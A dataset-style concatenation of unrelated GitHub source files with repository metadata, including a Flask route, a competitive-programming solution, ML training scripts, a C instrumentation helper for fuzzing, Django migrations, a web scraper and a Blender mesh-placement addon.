db.execute("UPDATE systemsettings SET logoinheader=:logoinheader WHERE id=:id", logoinheader=logoinheader, id=1)
return jsonify([{"status": "success", "msg": "Changes saved."}])
else:
return redirect(url_for("home"))
### Run Flask App
if __name__ == "__main__":
app.run(debug=True)
|
[
"m.ahmednoor7@yahoo.com"
] |
m.ahmednoor7@yahoo.com
|
419801dc9b41a351205b81a2536848b549bcdca3
|
67a48a7a2db56247fdd84474efa35124565fd8b9
|
/Codeforces/1567/1567a.py
|
d8ac3e266bff074dc1c8d5d2ab0d617f691e4d6f
|
[] |
no_license
|
qazz625/Competitive-Programming-Codes
|
e3de31f9276f84e919a6017b2cf781c946809862
|
e5df9cdc4714d78b7b6a7535ed7a45e07d3781c3
|
refs/heads/master
| 2022-08-30T07:57:55.172867
| 2022-08-10T08:02:07
| 2022-08-10T08:02:07
| 242,182,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 213
|
py
|
t = int(input())
for _ in range(t):
n = int(input())
arr = []
s = input()
for x in s:
if x == 'L' or x == 'R':
arr += [x]
elif x == 'D':
arr += ['U']
else:
arr += ['D']
print(*arr, sep='')
|
[
"arun49804@gmail.com"
] |
arun49804@gmail.com
|
1de3f0d35f4975c34f1ea90e65390c64a73f455e
|
849613f19ea52137ff0b5e8875d501ccfc77fef1
|
/3-final-forest.py
|
9e267756f65d45460f99a5798b959a45cae6280a
|
[] |
no_license
|
smutaogroup/VVD_analysis
|
bc3b3f682fb5d341cbf5033e1f007c238b26bfce
|
aa19125e4352ded93c389b945137a9dfe2bcf58e
|
refs/heads/master
| 2020-03-19T14:46:05.016613
| 2018-06-08T15:51:26
| 2018-06-08T15:51:26
| 136,638,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
#!/bin/env python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.multiclass import OneVsOneClassifier
from msmbuilder.io import load_meta, load_trajs
import sys
from sklearn.externals import joblib
depth = 9
meta, all_data = load_trajs('alpha_carbon/')
meta, all_label = load_trajs('macro-mapping/')
all_data_one = np.concatenate(list(all_data.values()))
all_label_one = np.concatenate(list(all_label.values()))
clf = OneVsOneClassifier(RandomForestClassifier(n_estimators=100, max_depth=depth, random_state=0))
clf.fit(all_data_one, all_label_one)
print (' Depth %d Train Accu: %.3f' %(
depth, np.sum(clf.predict(all_data_one) == all_label_one) / len(all_label_one)))
## save model
joblib.dump(clf, 'ovo-randomforest/final_es100_'+str(depth)+".pkl")
|
[
"noreply@github.com"
] |
smutaogroup.noreply@github.com
|
3d27cf4f50a9cc4bd469bd18977762b572f062a1
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/company/new_problem/look_week_into_different_child/woman.py
|
adf36b9a017251053bd4003aaba072a84a85d48d
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
#! /usr/bin/env python
def right_week_or_little_person(str_arg):
seem_work_for_next_man(str_arg)
print('eye')
def seem_work_for_next_man(str_arg):
print(str_arg)
if __name__ == '__main__':
right_week_or_little_person('place')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
0df540ab0532f179ce46a8102168e91cb9ce3765
|
c9d162af983ca149c58e045c87cc705cdb57b398
|
/instrumentor.py
|
ce07637261fdc29e825c01f93bfdcd1f4daa1063
|
[] |
no_license
|
arielazary/afl_preprocessing
|
2361f56986ce90ac56c4dc923964fd410acbe617
|
638e70c45cd453d57358b9359b4f7e46bf07e122
|
refs/heads/master
| 2020-04-25T22:47:47.500534
| 2019-02-28T14:07:16
| 2019-02-28T14:07:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 517
|
py
|
with open('example_1.c') as f:
lines = f.readlines()
new_lines = lines.copy()
for line in lines:
if lines.index(line) == 0:
# globals
new_lines.insert(new_lines.index(line), '#include <stdio.h>\n')
if "pthread_mutex_lock" in line:
new_lines.insert(new_lines.index(line), 'float sec=0.0;\n scanf("%f", &sec);\n if (sec >= 0 && sec <= 10) sleep(sec/10);\nprintf("%f", sec);\n')
with open('example_1_instrumented.c', 'w') as fw:
for line in new_lines:
fw.write(line)
|
[
"gefenk9@gmail.com"
] |
gefenk9@gmail.com
|
d9defe5ad47eb503e1e8834bad3974c9f76ea1ae
|
33fc4f5b3b92fc5d84be6c4872094264be5c2192
|
/108numpy-copy-deepcopy.py
|
c41df93204747de028547d6883e0e74eb2590112
|
[] |
no_license
|
greenmac/python-morvan-numpy-pandas
|
2ee9f572b910f65b44fe76316774fa9f604e9eb2
|
77fe010b15074e7ecabaefc07bc80bf667575d89
|
refs/heads/master
| 2020-04-12T14:54:47.317643
| 2018-12-22T07:18:19
| 2018-12-22T07:18:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
# https://morvanzhou.github.io/tutorials/data-manipulation/np-pd/2-8-np-copy/
import numpy as np
# a = np.arange(4)
# b = a
# c = a
# d = b
# a[0] = 11
# print(a)
# print(b)
# print(c)
# print(d)
# print(b is a)
# print(d is a)
# a = np.arange(4)
# b = a
# c = a
# d = b
# a[0] = 11
# d[1:3] = [22, 33]
# print(a)
# print(b)
# print(c)
# print(d)
a = np.arange(4)
b = a
c = a
d = b
a[0] = 11
d[1:3] = [22, 33]
b = a.copy() # deep copy, 深度copy, 這樣就不會被關聯
a[3] = 44
print(a)
print(b) # b因為deep copy的關係, 所以b[3]不會被改變, 這樣就不會被關聯
print(c)
print(d)
|
[
"alwaysmac@msn.com"
] |
alwaysmac@msn.com
|
b192d349f8113f13b7778ea0a5d27e09e99aba44
|
e7b8c14b4f590f1a1d41a8bf01c3acbdb4f32215
|
/sumListNumbers.py
|
b68643f0b2cf641e37298d2f49cc8522f78084f2
|
[] |
no_license
|
gocersensei/python
|
6e11c8cc2bef1c93127465249b83b6b5571950dd
|
d7bcb16c80c7f79a5ed2d08b77258d18db4d96c1
|
refs/heads/master
| 2023-07-28T08:50:11.628297
| 2021-09-14T11:06:39
| 2021-09-14T11:06:39
| 287,108,426
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 727
|
py
|
#
# Compete the sum of numbers entered by the user,
# ignoring non-numeric input
#
# Read the first line of input from the user
line = input("Enter a number: ")
total = 0
# Keep reading until the user enters a blank line
while line != "":
try:
# Try and convert the line to a number
num = float(line)
# If the conversion succeeds then add it to the total and display it
total = total + num
print("The total is now", total)
except ValueError:
# Display an error message before going on to read the next value
print("That wasn't a number.")
# Read the next number
line = input("Enter a number: ")
# Display the total
print("The grand total is", total)
|
[
"gocersensei@gmail.com"
] |
gocersensei@gmail.com
|
96862019c227fd93b2d73f7b636aa92661f6a361
|
98a3b6e871d9aea29c480402d85bf25bb7f11c1f
|
/train_nitre_data.py
|
a20c63c48a00b94bf40e8a633ea5c14510361e0d
|
[] |
no_license
|
funnyday16/HardGAN
|
eb2e543d00b2886fbec6f75f729f34b2ed39db7a
|
abe9f6959179bab9bbd7ef929ae4c2af735ec691
|
refs/heads/master
| 2023-02-17T13:28:50.607523
| 2021-01-18T07:07:47
| 2021-01-18T07:07:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,995
|
py
|
"""
paper: GridDehazeNet: Attention-Based Multi-Scale Network for Image Dehazing
file: train_data.py
about: build the training dataset
author: Xiaohong Liu
date: 01/08/19
"""
# --- Imports --- #
import torch.utils.data as data
from PIL import Image
from random import randrange
from torchvision.transforms import Compose, ToTensor, Normalize
import torchvision.transforms as tfs
from torchvision.transforms import functional as FF
import random
import os
from glob import glob
import re
# --- Training dataset --- #
class TrainData(data.Dataset):
def __init__(self, crop_size, train_data_dir, train_data_gt):
super().__init__()
#pattern = re.compile(r'\d+(?<=hazy)')
fpaths = glob(os.path.join(train_data_dir, '*.png'))
haze_names = []
gt_names = []
for path in fpaths:
haze_names.append(path.split('/')[-1])
gt = path.split('/')[-1].split('_')[0].split('.')[0]
if '2019' in train_data_gt:
gt = gt + '_GT'
gt_names.append(str(gt)+'.png')
self.haze_names = haze_names
self.gt_names = gt_names
self.crop_size = crop_size
self.train_data_dir = train_data_dir
self.train_data_gt = train_data_gt
self.haze_cache = {}
self.gt_cache = {}
for haze_name in haze_names:
if haze_name in self.haze_cache:
continue
haze_img = Image.open(self.train_data_dir + '/' +haze_name ).convert('RGB')
self.haze_cache[haze_name] = haze_img
for gt_name in gt_names:
if gt_name in self.gt_cache:
continue
gt_img = Image.open(self.train_data_gt + gt_name).convert('RGB')
self.gt_cache[gt_name] = gt_img
print ('use cache')
def generate_scale_label(self, haze, gt):
f_scale = 0.8 + random.randint(0, 7) / 10.0
width, height = haze.size
haze = haze.resize((int(width * f_scale), (int(height * f_scale))), resample = (Image.BICUBIC))
gt = gt.resize((int(width * f_scale), (int(height * f_scale))), resample = (Image.BICUBIC))
return haze, gt
def get_images(self, index):
crop_width, crop_height = self.crop_size
haze_name = self.haze_names[index]
gt_name = self.gt_names[index]
haze_img = self.haze_cache[haze_name]
gt_img = self.gt_cache[gt_name]
haze_img, gt_img = self.generate_scale_label(haze_img, gt_img)
width, height = haze_img.size
if width < crop_width or height < crop_height:
raise Exception('Bad image size: {}'.format(gt_name))
# --- x,y coordinate of left-top corner --- #
x, y = randrange(0, width - crop_width + 1), randrange(0, height - crop_height + 1)
haze_crop_img = haze_img.crop((x, y, x + crop_width, y + crop_height))
gt_crop_img = gt_img.crop((x, y, x + crop_width, y + crop_height))
rand_hor=random.randint(0,1)
rand_rot=random.randint(0,3)
haze_crop_img=tfs.RandomHorizontalFlip(rand_hor)(haze_crop_img)
gt_crop_img=tfs.RandomHorizontalFlip(rand_hor)(gt_crop_img)
if rand_rot:
haze_crop_img=FF.rotate(haze_crop_img,90*rand_rot)
gt_crop_img=FF.rotate(gt_crop_img,90*rand_rot)
# --- Transform to tensor --- #
transform_haze = Compose([ToTensor(), Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
transform_gt = Compose([ToTensor()])
haze = transform_haze(haze_crop_img)
gt = transform_gt(gt_crop_img)
haze_gt = transform_gt(gt_crop_img)
# --- Check the channel is 3 or not --- #
if list(haze.shape)[0] is not 3 or list(gt.shape)[0] is not 3:
raise Exception('Bad image channel: {}'.format(gt_name))
return haze, gt, haze_gt
def __getitem__(self, index):
res = self.get_images(index)
return res
def __len__(self):
return len(self.haze_names)
|
[
"noreply@github.com"
] |
funnyday16.noreply@github.com
|
e8ce8039f52567811f2bdb20c09583453a843219
|
018fa2ef4c1a7e4797549951a56784f5409c0f92
|
/user/migrations/0001_initial.py
|
1711546fb46d563d64e3b99407f2d4f040bf9340
|
[] |
no_license
|
dyx77421088/studentManage
|
ab2f6c25acd0331b1047f2abccca433e26c33a29
|
890cc936368654ab438171fad2392bcd61efb4bc
|
refs/heads/master
| 2022-11-22T19:48:54.452622
| 2020-07-14T10:18:09
| 2020-07-14T10:18:09
| 279,074,124
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 843
|
py
|
# Generated by Django 3.0.8 on 2020-07-13 16:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=255, verbose_name='用户名')),
('password', models.CharField(max_length=255, verbose_name='密码')),
('phone_number', models.CharField(max_length=255, unique=True, verbose_name='手机号')),
],
options={
'verbose_name': '用户表',
'verbose_name_plural': '用户表',
},
),
]
|
[
"2639074625@qq.com"
] |
2639074625@qq.com
|
bfa47be83ff0943752e0807cdd52e23b8987e48d
|
e804d12c678bc1035ac1def37a813ce6b41f60a6
|
/games_links_parser.py
|
184ecd608d693161b55a441363fbdf05263834fd
|
[] |
no_license
|
ilya201551/PsGameTrader_games_parser
|
76148ea80ff95a1204dfd4b5aeffd882026bee3d
|
d5d06b68b1e5b7e21e5debfe01b7147138bd3a8c
|
refs/heads/master
| 2022-11-15T18:41:39.964207
| 2020-06-23T14:11:18
| 2020-06-23T14:11:18
| 274,419,694
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,004
|
py
|
import requests
from bs4 import BeautifulSoup as bs
BASE_URL = 'https://nextgame.net'
GAMES_CATALOG_URL = 'https://nextgame.net/catalog/sony-playstation4/games-ps4/'
HEADERS = {
'accept': '*/*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3'
}
class GamesLinksParser:
def __init__(self, headers, session, base_url, games_catalog_url):
self.session = session
self.headers = headers
self.base_url = base_url
self.games_catalog_url = games_catalog_url
self.pages_number = self.__get_pages_number()
self.pages_urls_list = self.__get_pages_urls_list()
def __get_pages_number(self):
request = self.session.get(self.games_catalog_url, headers=self.headers)
soup = bs(request.content, 'html.parser')
pages_div = soup.find('div', attrs={'class': 'nums'})
pages_a = pages_div.find_all('a')[3]
return int(pages_a.text)
def __get_pages_urls_list(self):
pages_urls_list = []
for page in range(1, self.pages_number + 1):
pages_urls_list.append(self.games_catalog_url + '?PAGEN_1=%s' % page)
return pages_urls_list
def get_games_links_list(self):
games_links_list = []
for page_url in self.pages_urls_list:
request = self.session.get(page_url, headers=self.headers)
soup = bs(request.content, 'html.parser')
games_divs = soup.find_all('div', attrs={'class': 'item-title'})
for game_div in games_divs:
game_link = self.base_url + game_div.find('a')['href']
games_links_list.append(game_link)
return games_links_list
def main():
session = requests.session()
games_link_parser = GamesLinksParser(HEADERS, session, BASE_URL, GAMES_CATALOG_URL)
games_links_list = games_link_parser.get_games_links_list()
for game_link in games_links_list:
print(game_link)
main()
|
[
"kurilchik13@mail.ru"
] |
kurilchik13@mail.ru
|
2d3b00cefeddbe2466d824497e9ce94a26797fab
|
4d35ead619ef8ae5e94084878d4732af1e3847cb
|
/utils/common.py
|
7d3f3958a6862b0b61f01f6a50fb546c01f5137e
|
[] |
no_license
|
hallazie/OrganicGridGenerator
|
bea220798fa2beb734b1e0db31af7f91062ece03
|
b8e4a96e827dc2fb5532de6df76b19fbaf5e1cdb
|
refs/heads/master
| 2023-08-27T17:47:20.151036
| 2021-11-02T03:23:01
| 2021-11-02T03:23:01
| 386,870,439
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
# coding:utf-8
# @author: xiao shanghua
from src.items import *
import math
def euc_distance(v1, v2):
return math.sqrt((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2)
|
[
"hallazie@outlook.com"
] |
hallazie@outlook.com
|
e3243a6972f33c39d42f612fbabe048acdee4370
|
2a7f59d07ec2fe52084a1077dc0e2e70db429aff
|
/PetHospital-server/disease/serializers.py
|
7608e0c7a9a0bcbff6ad3efc365336c042b9b7d2
|
[
"MIT"
] |
permissive
|
Tedstack/PetHospital
|
b73d9ab0f3aa8f8dba060c17f553125221636a1c
|
c4b11c82ccd18d8a5277f651befbfa60500bebc6
|
refs/heads/master
| 2021-04-26T23:09:53.295703
| 2019-08-29T02:14:06
| 2019-08-29T02:14:06
| 123,938,094
| 0
| 0
| null | 2020-07-15T15:35:41
| 2018-03-05T15:18:19
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 591
|
py
|
from rest_framework import serializers
from .models import *
class DiseaseGroupSerializer(serializers.ModelSerializer):
class Meta:
model = DiseaseGroup
fields = '__all__'
class DiseaseSerializer(serializers.ModelSerializer):
class Meta:
model = Disease
fields = '__all__'
class DiseaseImageSerializer(serializers.ModelSerializer):
class Meta:
model = DiseaseImage
fields = '__all__'
class ProcessSerializer(serializers.ModelSerializer):
class Meta:
model = Process
fields = '__all__'
|
[
"1542752218@qq.com"
] |
1542752218@qq.com
|
5e76dbde1a46d4f115b4a7aa5778b0877a4af877
|
a59a7346a0cc7ed84d091da3784e01f13b67cf17
|
/arts/migrations/0001_initial.py
|
9a9c4f724c38997d926fd06e58f5ea05bdaed5e4
|
[] |
no_license
|
nikhilmuz/RangKshetra-API-Gateway
|
5ed66ea851d451125f612c63c5be38026baa567e
|
b5d4a104ba7eb90dc4074cca16c9d8cdaf2be3f0
|
refs/heads/master
| 2020-03-28T13:51:33.515582
| 2018-10-12T17:42:36
| 2018-10-12T17:42:36
| 148,435,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 682
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-09-03 10:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='File',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('file', models.FileField(upload_to=b'')),
('remark', models.CharField(max_length=20)),
('timestamp', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"nikhil.nikhil.muz@gmail.com"
] |
nikhil.nikhil.muz@gmail.com
|
f95eb6c548d33fdfb4e4c5bca3aec825ebb08bec
|
8957fd60446378ba77d5920c883935bac9275933
|
/btools/building/customobj.py
|
f74c400d927c3004785f0cf10d68d480f9d7714c
|
[
"MIT"
] |
permissive
|
ranjian0/building_tools
|
37f647608873288db3346bc7d2d9e2c97fbefabe
|
4a5950ed712b41fa3b953ea4ac3e1b1db8d5f489
|
refs/heads/master
| 2023-09-04T01:53:35.926031
| 2023-03-12T09:58:05
| 2023-03-12T09:58:05
| 123,632,239
| 831
| 94
|
MIT
| 2021-02-08T12:58:09
| 2018-03-02T21:22:22
|
Python
|
UTF-8
|
Python
| false
| false
| 10,758
|
py
|
"""
Tools to allow users to place custom meshes on a building
"""
import bpy
import bmesh
from mathutils import Matrix, Vector
from bpy.props import PointerProperty
from .facemap import (
FaceMap,
add_faces_to_map,
add_facemap_for_groups
)
from ..utils import (
select,
local_xyz,
bm_to_obj,
crash_safe,
bm_from_obj,
popup_message,
calc_faces_median,
calc_verts_median,
get_bounding_verts,
calc_face_dimensions,
bmesh_from_active_object,
subdivide_face_vertically,
subdivide_face_horizontally,
get_selected_face_dimensions,
)
from ..utils import VEC_UP, VEC_FORWARD
from .array import ArrayProperty, ArrayGetSet
from .sizeoffset import SizeOffsetProperty, SizeOffsetGetSet
class CustomObjectProperty(bpy.types.PropertyGroup, SizeOffsetGetSet, ArrayGetSet):
array: PointerProperty(type=ArrayProperty)
size_offset: PointerProperty(type=SizeOffsetProperty)
def init(self, wall_dimensions):
self["wall_dimensions"] = wall_dimensions
self.size_offset.init(
(self["wall_dimensions"][0] / self.count, self["wall_dimensions"][1]),
default_size=(1.0, 1.0),
default_offset=(0.0, 0.0),
)
def draw(self, context, layout):
box = layout.box()
self.size_offset.draw(context, box)
layout.prop(self.array, "count")
@crash_safe
def add_custom_execute(self, context):
custom_obj = context.scene.btools_custom_object
if not custom_obj:
# Custom object has not been assigned
self.report({'INFO'}, "No Object Selected!")
return {"CANCELLED"}
if custom_obj.users == 0 or custom_obj.name not in context.view_layer.objects:
# Object was already deleted
self.report({'INFO'}, "Object has been deleted!")
return {"CANCELLED"}
self.props.init(get_selected_face_dimensions(context))
apply_transforms(context, custom_obj)
place_custom_object(context, self.props, custom_obj)
transfer_materials(custom_obj, context.object)
return {'FINISHED'}
class BTOOLS_OT_add_custom(bpy.types.Operator):
"""Place custom meshes on the selected faces"""
bl_idname = "btools.add_custom"
bl_label = "Add Custom Geometry"
bl_options = {"REGISTER", "UNDO", "PRESET"}
props: PointerProperty(type=CustomObjectProperty)
@classmethod
def poll(cls, context):
return context.object is not None and context.mode == "EDIT_MESH"
def execute(self, context):
add_facemap_for_groups([FaceMap.CUSTOM])
return add_custom_execute(self, context)
def draw(self, context):
self.props.draw(context, self.layout)
def apply_transforms(context, obj):
# -- store the current active object
mode_previous = context.mode
active_previous = context.active_object
# -- switch to object mode, if we are not already there
if context.mode != "OBJECT":
bpy.ops.object.mode_set(mode='OBJECT')
# -- make obj the active object and select it
bpy.context.view_layer.objects.active = obj
select(bpy.context.view_layer.objects, False)
obj.select_set(True)
# -- apply transform
bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)
# -- resume the previous state
bpy.context.view_layer.objects.active = active_previous
select(bpy.context.view_layer.objects, False)
active_previous.select_set(True)
bpy.ops.object.mode_set(mode=mode_previous.replace('_MESH', ""))
def place_custom_object(context, prop, custom_obj):
with bmesh_from_active_object(context) as bm:
faces = [face for face in bm.faces if face.select]
for face in faces:
face.select = False
# No support for upward/downward facing
if face.normal.z:
popup_message("Faces with Z+/Z- normals not supported!", title="Invalid Face Selection")
continue
array_faces = subdivide_face_horizontally(bm, face, widths=[prop.size_offset.size.x] * prop.count)
for aface in array_faces:
# -- Create split and place obj
split_face = create_split(bm, aface, prop.size_offset.size, prop.size_offset.offset)
place_object_on_face(bm, split_face, custom_obj, prop)
bmesh.ops.remove_doubles(bm, verts=bm.verts, dist=0.0001)
def transfer_materials(from_object, to_obj):
"""Transfer materials from 'from_object' to 'to_object'"""
materials = from_object.data.materials
if not materials:
return
# -- copy materials
to_mats = to_obj.data.materials
if not to_mats:
# -- to_obj has no materials
list(map(to_mats.append, materials))
else:
# -- to_obj has some materials, ensure we are not duplicating
for mat in materials:
if mat.name not in to_mats:
to_mats.append(mat)
def mat_name_from_idx(idx):
for i, m in enumerate(materials):
if i == idx:
return m.name.encode()
return "".encode()
# -- store material names on the face layer
bm = bm_from_obj(from_object)
bm.faces.layers.string.verify()
mat_name = bm.faces.layers.string.active
for face in bm.faces:
face[mat_name] = mat_name_from_idx(face.material_index)
bm_to_obj(bm, from_object)
def duplicate_into_bm(bm, obj):
"""Copy all the mesh data in obj to the bm
Return the newly inserted faces
"""
max_index = len(bm.faces)
bm.from_mesh(obj.data.copy())
return [f for f in bm.faces if f.index >= max_index]
# TODO(ranjian0) refactor function (duplicated from create_window_split)
def create_split(bm, face, size, offset):
"""Use properties from SplitOffset to subdivide face into regular quads"""
wall_w, wall_h = calc_face_dimensions(face)
# horizontal split
h_widths = [wall_w / 2 + offset.x - size.x / 2, size.x, wall_w / 2 - offset.x - size.x / 2]
h_faces = subdivide_face_horizontally(bm, face, h_widths)
# vertical split
v_width = [wall_h / 2 + offset.y - size.y / 2, size.y, wall_h / 2 - offset.y - size.y / 2]
v_faces = subdivide_face_vertically(bm, h_faces[1], v_width)
return v_faces[1]
def place_object_on_face(bm, face, custom_obj, prop):
"""Place the custom_object mesh flush on the face"""
# XXX get mesh from custom_obj into bm
face_idx = face.index
custom_faces = duplicate_into_bm(bm, custom_obj)
face = [f for f in bm.faces if f.index == face_idx].pop() # restore reference
add_faces_to_map(bm, custom_faces, FaceMap.CUSTOM)
custom_verts = list({v for f in custom_faces for v in f.verts})
# (preprocess)calculate bounds of the object
# NOTE: bounds are calculated before any transform is made
dims = custom_obj.dimensions
current_size = [max(dims.x, dims.y), dims.z]
# -- move the custom faces into proper position on this face
transform_parallel_to_face(bm, custom_faces, face)
scale_to_size(bm, custom_verts, current_size, prop.size_offset.size, local_xyz(face))
# cleanup
bmesh.ops.delete(bm, geom=[face], context="FACES_ONLY")
def get_coplanar_faces(face_verts):
""" Determine extent faces that should be coplanar to walls"""
bounds = get_bounding_verts(face_verts)
coplanar_faces = (
list(bounds.topleft.link_faces) +
list(bounds.topright.link_faces) +
list(bounds.botleft.link_faces) +
list(bounds.botright.link_faces)
)
return set(coplanar_faces)
def calc_coplanar_median(face_verts):
""" Determine the median point for coplanar faces"""
return calc_faces_median(get_coplanar_faces(face_verts))
def calc_coplanar_normal(faces):
face_verts = list({v for f in faces for v in f.verts})
coplanar_faces = get_coplanar_faces(face_verts)
normals = {f.normal.copy().to_tuple(3) for f in coplanar_faces}
return Vector(normals.pop())
def transform_parallel_to_face(bm, custom_faces, target_face):
"""Move and rotate verts(mesh) so that it lies with it's
forward-extreme faces parallel to `face`
"""
target_normal = target_face.normal.copy()
target_median = target_face.calc_center_median()
verts = list({v for f in custom_faces for v in f.verts})
verts_median = calc_verts_median(verts)
custom_normal = calc_coplanar_normal(custom_faces)
try:
angle = target_normal.xy.angle_signed(custom_normal.xy)
except ValueError:
# TODO(ranjian0) Support all mesh shapes when placing along face
angle = 0
bmesh.ops.rotate(
bm, verts=verts,
cent=verts_median,
matrix=Matrix.Rotation(angle, 4, VEC_UP)
)
# -- determine the median of the faces that should be coplanar to the walls
coplanar_median = calc_coplanar_median(verts)
coplanar_median.z = verts_median.z # Compensate on Z axis for any coplanar faces not considered in calculations
# -- move the custom faces to the target face based on coplanar median
transform_diff = target_median - coplanar_median
bmesh.ops.translate(bm, verts=verts, vec=transform_diff)
def scale_to_size(bm, verts, current_size, target_size, local_dir):
"""Scale verts to target size along local direction (x and y)"""
x_dir, y_dir, z_dir = local_dir
target_width, target_height = target_size
current_width, current_height = current_size
# --scale
scale_x = x_dir * (target_width / current_width)
scale_y = y_dir * (target_height / current_height)
scale_z = Vector(map(abs, z_dir))
bmesh.ops.scale(
bm, verts=verts, vec=scale_x + scale_y + scale_z,
space=Matrix.Translation(-calc_verts_median(verts))
)
def set_face_materials(bm, faces):
mat_name = bm.faces.layers.string.active
if not mat_name:
return
obj_mats = bpy.context.object.data.materials
for f in faces:
mat = obj_mats.get(f[mat_name].decode())
f.material_index = list(obj_mats).index(mat)
classes = (CustomObjectProperty, BTOOLS_OT_add_custom)
def register_custom():
bpy.types.Scene.btools_custom_object = PointerProperty(
type=bpy.types.Object, description="Object to use for custom placement"
)
for cls in classes:
bpy.utils.register_class(cls)
def unregister_custom():
del bpy.types.Scene.btools_custom_object
for cls in classes:
bpy.utils.unregister_class(cls)
|
[
"karanjaichungwa@gmail.com"
] |
karanjaichungwa@gmail.com
|
f170ae73cc32f8a24174a1cab8adf207eff19644
|
68cc812ca27a960b8405523f5b1dfe35380e3ff7
|
/python/Flask.py
|
e74d13a946ee3705ef22d66a2fffa1feec9eded5
|
[] |
no_license
|
aloxvok/devopsbc
|
7c1bd78456af71ed21e04448fab877b5e4fcfe66
|
ba5a5d7a88ada055c86de4249b0de5194a32e741
|
refs/heads/master
| 2022-11-20T01:26:23.522262
| 2020-07-23T01:53:06
| 2020-07-23T01:53:06
| 266,654,300
| 0
| 0
| null | 2020-05-30T01:24:45
| 2020-05-25T01:14:45
|
Python
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
from flask import Flask
app = Flask(__name__)
#@app.route('/')
def hello_world():
return ('Hello, World!')
|
[
"hpinot9@gmail.com"
] |
hpinot9@gmail.com
|
0dbdb5ae711a8ff93851753cea7a8f866b145477
|
aa0d3ced25b3c919aefab90609acf30b7d242940
|
/collatio/migrations/0003_tag_image.py
|
5bda8a28ed803f7ac3dd1f336f16f0b23e7778df
|
[] |
no_license
|
sanchitkripalani47/Collatio
|
00428b7bf31a0d418a87f419518ae45832da2294
|
1b5037a3046226b61a41e1925763b246f18b7e6a
|
refs/heads/main
| 2023-05-19T01:53:05.150499
| 2021-06-10T14:49:01
| 2021-06-10T14:49:01
| 343,282,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
# Generated by Django 3.0.5 on 2021-03-14 07:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('collatio', '0002_auto_20210313_2313'),
]
operations = [
migrations.AddField(
model_name='tag',
name='image',
field=models.ImageField(default='image_not_found.jpg', null=True, upload_to='images'),
),
]
|
[
"sanchitkripalani47@gmail.com"
] |
sanchitkripalani47@gmail.com
|
1d8a0f6fcb29d01cfa39a81b7af8a2a2e862f97e
|
f88bc2bfc596908f2155ba0c4e58fce46321d988
|
/call.py
|
daa82ad0b71c3b1b1558f0b515311374c0201ca3
|
[] |
no_license
|
FragrantRookie/LMS-ANN-Project
|
8c8de8df93f6a5ccf1d391092f8fdcbf93a1f60e
|
c495bf14afc2fe1dbb6bfdc4f1991839bb3ef432
|
refs/heads/master
| 2023-04-26T15:58:46.495484
| 2018-11-12T14:06:51
| 2018-11-12T14:06:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,066
|
py
|
from speech_noise_removal_final import RNNFilter
from LMS_tf import LMSFilter
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.ticker as ticker
import pickle
#for learning rate
lr = [0.2, 0.15, 0.1, 0.05, 0.02, 0.015, 0.01, 0.005, 0.002, 0.001] #0.75, 0.7, 0.6, 0.5, 0.4, 0.3, 0.25,
#lr = [0.002]
lr.sort()
fin_snr_train = []
fin_snr_test = []
def l_plotting(train_data, test_data):
fig, ax = plt.subplots()
ax.plot(lr, train_data, 'r', linewidth=4.0, label='Final NMSE of output for training data')
ax.plot(lr, test_data, 'b', linewidth=4.0, label='NMSE of output for testing data')
start, end = ax.get_ylim()
ax.yaxis.set_ticks(np.arange(start, end, 0.5))
ax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%0.1f'))
fig.suptitle('Final NMSE vs Learning Rate (lower range) for RNN Filter', fontsize=36)
plt.ylabel('NMSE', fontsize=24)
plt.xlabel('Learning Rate', fontsize=24)
for tick in ax.xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize(20)
#plt.show()
plt.savefig('plots/snrvslrl_code.png')
with open('plots/snrvslrl_code.pkl', "wb") as fp:
pickle.dump(fig, fp, protocol=4)
for i in range(len(lr)):
filter = LMSFilter('Mockingbird.wav', epoch = 10, lr = lr[i])
print('For learning rate:', lr[i])
